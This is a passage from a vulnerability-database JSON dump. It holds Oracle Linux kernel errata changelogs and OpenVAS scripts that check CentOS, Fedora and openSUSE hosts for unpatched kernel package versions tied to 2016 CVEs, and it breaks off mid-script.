(David Arcari) [1393725 1373703]\n[3.10.0-514.9.1]\n- [drm] i915/kbl: Remove preliminary_hw_support protection from KBL. 
(Rob Clark) [1413092 1305702]\n- [netdrv] slip: Fix deadlock in write_wakeup (Steve Best) [1412225 1403497]\n- [netdrv] slip: fix spinlock variant (Steve Best) [1412225 1403497]\n- [kernel] kmod: use system_unbound_wq instead of khelper (Luiz Capitulino) [1411816 1395860]\n- [nvme] switch abort to blk_execute_rq_nowait (David Milburn) [1411669 1392923]\n- [netdrv] ibmveth: calculate gso_segs for large packets (Gustavo Duarte) [1411382 1361958]\n- [netdrv] ibmveth: set correct gso_size and gso_type (Gustavo Duarte) [1411382 1361958]\n- [netdrv] allow macvlans to move to net namespace (Jarod Wilson) [1409829 1368830]\n- [pci] Set Read Completion Boundary to 128 iff Root Port supports it (_HPX) (Myron Stowe) [1406290 1387674]\n- [pci] Export pcie_find_root_port() (Myron Stowe) [1406290 1387674]\n- [rtc] cmos: Initialize hpet timer before irq is registered (Pratyush Anand) [1404184 1299001]\n- [x86] amd: Fix cpu_llc_id for AMD Fam17h systems (Suravee Suthikulpanit) [1402444 1395399]\n- [powerpc] powernv: Fix stale PE primary bus (Steve Best) [1402440 1395275]\n- [misc] cxl: Fix coredump generation when cxl_get_fd() is used (Gustavo Duarte) [1402439 1397943]\n- [pci] cxl: use pcibios_free_controller_deferred() when removing vPHBs (Gustavo Duarte) [1402438 1395323]\n- [scsi] qla2xxx: do not abort all commands in the adapter during EEH recovery (Gustavo Duarte) [1402436 1393254]\n- [scsi] qla2xxx: fix invalid DMA access after command aborts in PCI device remove (Gustavo Duarte) [1402436 1393254]\n- [scsi] qla2xxx: do not queue commands when unloading (Gustavo Duarte) [1402436 1393254]\n- [net] packet: fix race condition in packet_set_ring (Hangbin Liu) [1401852 1401853] {CVE-2016-8655}\n[3.10.0-514.8.1]\n- [netdrv] i40e: Fix corruption when transferring large files (Stefan Assmann) [1413101 1404060]\n[3.10.0-514.7.1]\n- [kernel] printk: avoid livelock if another CPU printks continuously (Denys Vlasenko) [1402314 1294066]", "edition": 4, "modified": "2017-03-02T00:00:00", 
"published": "2017-03-02T00:00:00", "id": "ELSA-2017-0386", "href": "http://linux.oracle.com/errata/ELSA-2017-0386.html", "title": "kernel security, bug fix, and enhancement update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:52", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9084", "CVE-2016-8630", "CVE-2016-9083", "CVE-2016-4485", "CVE-2016-4482", "CVE-2016-9576", "CVE-2016-8646"], "description": "kernel-uek\n[4.1.12-61.1.27]\n- vfio/pci: Fix integer overflows, bitmask check (Vlad Tsyrklevich) [Orabug: 25164094] {CVE-2016-9083} {CVE-2016-9084}\n- Don't feed anything but regular iovec's to blk_rq_map_user_iov (Linus Torvalds) [Orabug: 25231931] {CVE-2016-9576}\n- kvm: x86: Check memopp before dereference (CVE-2016-8630) (Owen Hofmann) [Orabug: 25417387] {CVE-2016-8630}\n- crypto: algif_hash - Only export and import on sockets with data (Herbert Xu) [Orabug: 25417799] {CVE-2016-8646}\n- USB: usbfs: fix potential infoleak in devio (Kangjie Lu) [Orabug: 25462755] {CVE-2016-4482}\n- net: fix infoleak in llc (Kangjie Lu) [Orabug: 25462799] {CVE-2016-4485}\n[4.1.12-61.1.26]\n- xen-netback: fix extra_info handling in xenvif_tx_err() (Paul Durrant) [Orabug: 25445336] \n- net: Documentation: Fix default value tcp_limit_output_bytes (Niklas Cassel) [Orabug: 25458076] \n- tcp: double default TSQ output bytes limit (Wei Liu) [Orabug: 25458076] \n- xenbus: fix deadlock on writes to /proc/xen/xenbus (David Vrabel) [Orabug: 25430143]", "edition": 4, "modified": "2017-02-06T00:00:00", "published": "2017-02-06T00:00:00", "id": "ELSA-2017-3514", "href": "http://linux.oracle.com/errata/ELSA-2017-3514.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:34:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8655", "CVE-2016-9084", "CVE-2016-8630", "CVE-2016-9083"], 
"description": "Check the version of kernel", "modified": "2019-03-11T00:00:00", "published": "2017-03-07T00:00:00", "id": "OPENVAS:1361412562310882673", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882673", "type": "openvas", "title": "CentOS Update for kernel CESA-2017:0386 centos7", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2017:0386 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882673\");\n script_version(\"$Revision: 14095 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-11 14:54:56 +0100 (Mon, 11 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-07 05:44:17 +0100 (Tue, 07 Mar 2017)\");\n script_cve_id(\"CVE-2016-8630\", \"CVE-2016-8655\", \"CVE-2016-9083\", \"CVE-2016-9084\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for kernel CESA-2017:0386 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of kernel\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux kernel,\nthe core of any Linux operating system.\n\nSecurity Fix(es):\n\n * Linux kernel built with the Kernel-based Virtual Machine (CONFIG_KVM)\nsupport is vulnerable to a null pointer dereference flaw. It could occur on\nx86 platform, when emulating an undefined instruction. An attacker could\nuse this flaw to crash the host kernel resulting in DoS. (CVE-2016-8630,\nImportant)\n\n * A race condition issue leading to a use-after-free flaw was found in the\nway the raw packet sockets implementation in the Linux kernel networking\nsubsystem handled synchronization while creating the TPACKET_V3 ring\nbuffer. 
A local user able to open a raw packet socket (requires the\nCAP_NET_RAW capability) could use this flaw to elevate their privileges on\nthe system. (CVE-2016-8655, Important)\n\n * A flaw was discovered in the Linux kernel's implementation of VFIO. An\nattacker issuing an ioctl can create a situation where memory is corrupted\nand modify memory outside of the expected area. This may overwrite kernel\nmemory and subvert kernel execution. (CVE-2016-9083, Important)\n\n * The use of a kzalloc with an integer multiplication allowed an integer\noverflow condition to be reached in vfio_pci_intrs.c. This combined with\nCVE-2016-9083 may allow an attacker to craft an attack and use unallocated\nmemory, potentially crashing the machine. (CVE-2016-9084, Moderate)\n\nRed Hat would like to thank Philip Pettersson for reporting CVE-2016-8655.\n\nAdditional Changes:\n\nSpace precludes documenting all of the bug fixes and enhancements included\nin this advisory. To see the complete list of bug fixes and enhancements,\nrefer to the linked KnowledgeBase article.\");\n\n script_tag(name:\"affected\", value:\"kernel on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2017:0386\");\n script_xref(name:\"URL\", value:\"https://access.redhat.com/articles/2940041\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2017-March/022324.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release 
== \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~514.10.2.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~3.10.0~514.10.2.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~514.10.2.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.10.0~514.10.2.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~514.10.2.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~3.10.0~514.10.2.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~514.10.2.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~514.10.2.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~514.10.2.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~3.10.0~514.10.2.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~514.10.2.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~514.10.2.el7\", rls:\"CentOS7\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9084", "CVE-2016-8630", "CVE-2016-9083", "CVE-2016-8645"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-02T00:00:00", "id": "OPENVAS:1361412562310810159", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810159", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2016-ee3a114958", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-ee3a114958\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810159\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-02 14:03:10 +0100 (Fri, 02 Dec 2016)\");\n script_cve_id(\"CVE-2016-8645\", \"CVE-2016-8630\", \"CVE-2016-9084\", \"CVE-2016-9083\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-ee3a114958\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 23\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-ee3a114958\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ERTN3R5LEVJDD6AMU5EPH27E3YQ3CJ35\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", 
re:\"ssh/login/release=FC23\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.8.8~100.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9084", "CVE-2016-9083"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-02T00:00:00", "id": "OPENVAS:1361412562310810170", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810170", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2016-96d276367e", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-96d276367e\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810170\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-02 14:03:08 +0100 (Fri, 02 Dec 2016)\");\n script_cve_id(\"CVE-2016-9084\", \"CVE-2016-9083\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-96d276367e\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-96d276367e\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YKA5JXYKGE7LLWYWZARS2W4HUYXDWIV7\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.8.6~201.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-14T18:57:28", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7097", "CVE-2016-9794", "CVE-2016-8633", "CVE-2016-8655", "CVE-2016-9084", "CVE-2015-8962", "CVE-2015-8964", "CVE-2016-9555", "CVE-2016-8630", "CVE-2016-9178", "CVE-2015-8963", "CVE-2016-9083", "CVE-2015-8956", "CVE-2016-8646", "CVE-2016-7913", "CVE-2016-7042"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2016-12-09T00:00:00", "id": "OPENVAS:1361412562310851449", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851449", "type": "openvas", "title": "openSUSE: Security Advisory for kernel (openSUSE-SU-2016:3058-1)", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851449\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-12-09 05:38:55 +0100 (Fri, 09 Dec 2016)\");\n script_cve_id(\"CVE-2015-8956\", \"CVE-2015-8962\", \"CVE-2015-8963\", \"CVE-2015-8964\",\n \"CVE-2016-7042\", \"CVE-2016-7097\", \"CVE-2016-7913\", \"CVE-2016-8630\",\n \"CVE-2016-8633\", \"CVE-2016-8646\", \"CVE-2016-8655\", \"CVE-2016-9083\",\n \"CVE-2016-9084\", \"CVE-2016-9178\", \"CVE-2016-9555\", \"CVE-2016-9794\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for kernel (openSUSE-SU-2016:3058-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The openSUSE Leap 42.1 kernel was updated to 4.1.36 to receive various\n security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2016-8655: A race condition in the af_packet packet_set_ring\n function could be used by local attackers to crash the kernel or gain\n privileges (bsc#1012754).\n\n - CVE-2016-9794: A use-after-free in ALSA pcm could lead to crashes or\n allowed local users to potentially gain privileges (bsc#1013533).\n\n - CVE-2015-8962: Double free vulnerability in the 
sg_common_write function\n in drivers/scsi/sg.c in the Linux kernel allowed local users to gain\n privileges or cause a denial of service (memory corruption and system\n crash) by detaching a device during an SG_IO ioctl call (bnc#1010501).\n\n - CVE-2016-9178: The __get_user_asm_ex macro in\n arch/x86/include/asm/uaccess.h in the Linux kernel did not initialize a\n certain integer variable, which allowed local users to obtain sensitive\n information from kernel stack memory by triggering failure of a\n get_user_ex call (bnc#1008650).\n\n - CVE-2016-7913: The xc2028_set_config function in\n drivers/media/tuners/tuner-xc2028.c in the Linux kernel allowed local\n users to gain privileges or cause a denial of service (use-after-free)\n via vectors involving omission of the firmware name from a certain data\n structure (bnc#1010478).\n\n - CVE-2016-9555: The sctp_sf_ootb function in net/sctp/sm_statefuns.c in\n the Linux kernel lacks chunk-length checking for the first chunk, which\n allowed remote attackers to cause a denial of service (out-of-bounds\n slab access) or possibly have unspecified other impact via crafted SCTP\n data (bnc#1011685).\n\n - CVE-2015-8963: Race condition in kernel/events/core.c in the Linux\n kernel allowed local users to gain privileges or cause a denial of\n service (use-after-free) by leveraging incorrect handling of an swevent\n data structure during a CPU unplug operation (bnc#1010502).\n\n - CVE-2015-8964: The tty_set_termios_ldisc function in\n drivers/tty/tty_ldisc.c in the Linux kernel allowed local users to\n obtain sensitive information from kernel memory by reading a tty data\n structure (bnc#1010507).\n\n - CVE-2016-8646: The hash_accept function in crypto/algif_hash.c in the\n Linux kernel allowed local users to cause a denial of service (OOPS) by\n attempting to trigger use of in-kernel hash algorithms for a socket that\n has received zero bytes of data (bnc#1010150).\n\n - CVE-2016-8633: drivers/firewire/net.c in the Linux 
kernel in certain\n unusual hardware configurations, allowed remote attackers to execute\n arbitrary code via crafted fragmented packets (bnc#1008833 ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n\n script_tag(name:\"affected\", value:\"Kernel on openSUSE Leap 42.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:3058-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base\", rpm:\"kernel-debug-base~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base-debuginfo\", rpm:\"kernel-debug-base-debuginfo~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debugsource\", rpm:\"kernel-debug-debugsource~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"kernel-debug-devel-debuginfo\", rpm:\"kernel-debug-devel-debuginfo~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2\", rpm:\"kernel-ec2~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-base\", rpm:\"kernel-ec2-base~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-base-debuginfo\", rpm:\"kernel-ec2-base-debuginfo~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-debuginfo\", rpm:\"kernel-ec2-debuginfo~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-debugsource\", rpm:\"kernel-ec2-debugsource~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-devel\", rpm:\"kernel-ec2-devel~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pv\", rpm:\"kernel-pv~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pv-base\", rpm:\"kernel-pv-base~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pv-base-debuginfo\", rpm:\"kernel-pv-base-debuginfo~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pv-debuginfo\", rpm:\"kernel-pv-debuginfo~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pv-debugsource\", rpm:\"kernel-pv-debugsource~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pv-devel\", rpm:\"kernel-pv-devel~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla\", 
rpm:\"kernel-vanilla~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debuginfo\", rpm:\"kernel-vanilla-debuginfo~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debugsource\", rpm:\"kernel-vanilla-debugsource~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-devel\", rpm:\"kernel-vanilla-devel~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base-debuginfo\", rpm:\"kernel-xen-base-debuginfo~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-debugsource\", rpm:\"hdjmod-debugsource~1.28~28.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = 